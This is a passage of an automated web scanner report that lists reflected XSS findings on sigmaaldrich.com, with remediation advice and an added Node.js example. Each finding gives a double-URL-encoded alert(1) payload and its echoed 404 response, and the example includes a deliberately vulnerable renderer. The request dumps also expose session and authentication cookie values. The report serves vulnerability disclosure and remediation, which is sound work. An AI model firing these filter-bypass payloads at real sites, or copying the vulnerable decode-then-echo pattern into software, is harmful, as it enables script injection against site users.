bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:41 GMT
Content-Length: 28903
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/4ed07";alert(1)//58c74c259d","E404") ;
   </script>
...[SNIP]...

1.585. http://www.sigmaaldrich.com/materials-science/biomaterials.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/biomaterials.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b136b%2522%253balert%25281%2529%252f%252f212c8359466 was submitted in the REST URL parameter 1. This input was echoed as b136b";alert(1)//212c8359466 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. Here the double-encoded payload passes the filter after the web server's single decode, and the application then decodes it a second time, so the quote and semicolon reach the script unfiltered.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it cannot be avoided, the value should be escaped for a JavaScript string literal (quotes, backslashes, angle brackets and line terminators written as \uXXXX escapes) at the point where it is written into the script. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
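Findings 1.578 through 1.585 all describe the same mechanism: a filter that runs after one URL-decode, a second decode performed by the application afterwards, and the result concatenated into the string argument of cmCreateErrorTag in the 404 page. The following is an added example, not code from the scanned site or from this report; it models those three stages in Node.js, puts a hardened handler beside the vulnerable one, and includes the check that decides whether the echoed value broke out of the string literal. The cmCreateErrorTag("Error 404 | <url>","E404") shape is taken from the response snippets above; every function name (serverDecodeOnce, naiveFilter, vulnerableRender404, jsStringLiteral, hardenedRender404, firstArgIsIntactStringLiteral) and the sample host and path constants are assumptions made for the example.

```javascript
// Added example: models the double-URL-decode flaw reported in 1.578-1.585 and
// a hardened version of the same 404 error-tag sink. It is not code from the
// scanned site; the cmCreateErrorTag("Error 404 | <url>","E404") shape is taken
// from the report's response snippets, and every function name is an assumption.

// Stage 1: the web server percent-decodes the request path once.
function serverDecodeOnce(rawPath) {
  return decodeURIComponent(rawPath);
}

// Stage 2: a naive blacklist of characters often used in XSS. After a single
// decode the double-encoded payload still reads %22%3balert%281%29..., so it passes.
function naiveFilter(path) {
  return !/["'<>;]/.test(path);
}

// Stage 3, the flaw: the application decodes the already-decoded path again,
// after validation, and concatenates the result into a JavaScript string literal.
function vulnerableRender404(rawPath, host) {
  const once = serverDecodeOnce(rawPath);
  if (!naiveFilter(once)) return null;            // request "blocked"
  const twice = decodeURIComponent(once);         // second decode: %22 -> "
  return '<script>cmCreateErrorTag("Error 404 | http://' + host + twice +
         '","E404") ;</script>';
}

// Encoder for data placed inside a JS string literal within an HTML <script>.
// JSON.stringify escapes quotes, backslashes and control characters; the extra
// replacements keep "</script>" and "<!--" from reaching the HTML parser and
// neutralise the U+2028/U+2029 line terminators that older engines treat as newlines.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened handler: decode exactly once (the server already did that), never a
// second time, and encode for the exact output context at the point of use.
function hardenedRender404(rawPath, host) {
  const once = serverDecodeOnce(rawPath);
  const message = 'Error 404 | http://' + host + once;
  return '<script>cmCreateErrorTag(' + jsStringLiteral(message) +
         ',"E404") ;</script>';
}

// Check used to judge an output: is the first argument of cmCreateErrorTag still
// one well-formed double-quoted string literal followed by the expected comma?
// The scanner's "echoed as ...";alert(1)//..." finding is exactly a violation of this.
function firstArgIsIntactStringLiteral(html) {
  const marker = 'cmCreateErrorTag("';
  const start = html.indexOf(marker);
  if (start < 0) return false;
  for (let i = start + marker.length; i < html.length; i += 1) {
    const c = html[i];
    if (c === '\\') { i += 1; continue; }        // skip the escaped character
    if (c === '"') return html[i + 1] === ',';    // literal closed where expected?
  }
  return false;
}

// Constructed sample: the double-encoded path from finding 1.579 (assumed host).
const SAMPLE_HOST = 'www.sigmaaldrich.com:4402';
const SAMPLE_PATH = '/life-science33260%2522%253balert%25281%2529%252f%252fd3b818a82c5' +
                    '/your-favorite-gene-search/yfg-pbi.html';

console.log('vulnerable:', vulnerableRender404(SAMPLE_PATH, SAMPLE_HOST));
console.log('hardened:  ', hardenedRender404(SAMPLE_PATH, SAMPLE_HOST));
```

Run with node: the vulnerable output reproduces the report's 33260";alert(1)//d3b818a82c5 breakout, and firstArgIsIntactStringLiteral returns false for it; the hardened output keeps the value inside the literal because the only decode is the server's and the value is encoded for the script context rather than filtered. Note that the filter in naiveFilter does reject a single-encoded quote, which is why the scanner had to double-encode: blacklisting before canonicalisation is the ordering mistake the remediation text warns about.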

Request

GET /materials-scienceb136b%2522%253balert%25281%2529%252f%252f212c8359466/biomaterials.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:43 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-scienceb136b";alert(1)//212c8359466/biomaterials.html","E404") ;
   </script>
...[SNIP]...

1.586. http://www.sigmaaldrich.com/materials-science/biomaterials.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/biomaterials.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fb90%2522%253balert%25281%2529%252f%252ffece847e065 was submitted in the REST URL parameter 2. This input was echoed as 4fb90";alert(1)//fece847e065 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science/4fb90%2522%253balert%25281%2529%252f%252ffece847e065 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:44 GMT
Content-Length: 28922
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science/4fb90";alert(1)//fece847e065","E404") ;
   </script>
...[SNIP]...

1.587. http://www.sigmaaldrich.com/materials-science/learning-center.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/learning-center.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1488a%2522%253balert%25281%2529%252f%252f8bb7f56ba82 was submitted in the REST URL parameter 1. This input was echoed as 1488a";alert(1)//8bb7f56ba82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science1488a%2522%253balert%25281%2529%252f%252f8bb7f56ba82/learning-center.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:49 GMT
Content-Length: 28942
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science1488a";alert(1)//8bb7f56ba82/learning-center.html","E404") ;
   </script>
...[SNIP]...

1.588. http://www.sigmaaldrich.com/materials-science/material-science-products.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/material-science-products.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ef01%2522%253balert%25281%2529%252f%252fa4fe8ce1084 was submitted in the REST URL parameter 1. This input was echoed as 1ef01";alert(1)//a4fe8ce1084 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science1ef01%2522%253balert%25281%2529%252f%252fa4fe8ce1084/material-science-products.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:43 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science1ef01";alert(1)//a4fe8ce1084/material-science-products.html","E404") ;
   </script>
...[SNIP]...

1.589. http://www.sigmaaldrich.com/materials-science/material-science-products.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/material-science-products.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dda9b%2522%253balert%25281%2529%252f%252ffe8e88d2785 was submitted in the REST URL parameter 2. This input was echoed as dda9b";alert(1)//fe8e88d2785 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science/dda9b%2522%253balert%25281%2529%252f%252ffe8e88d2785 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
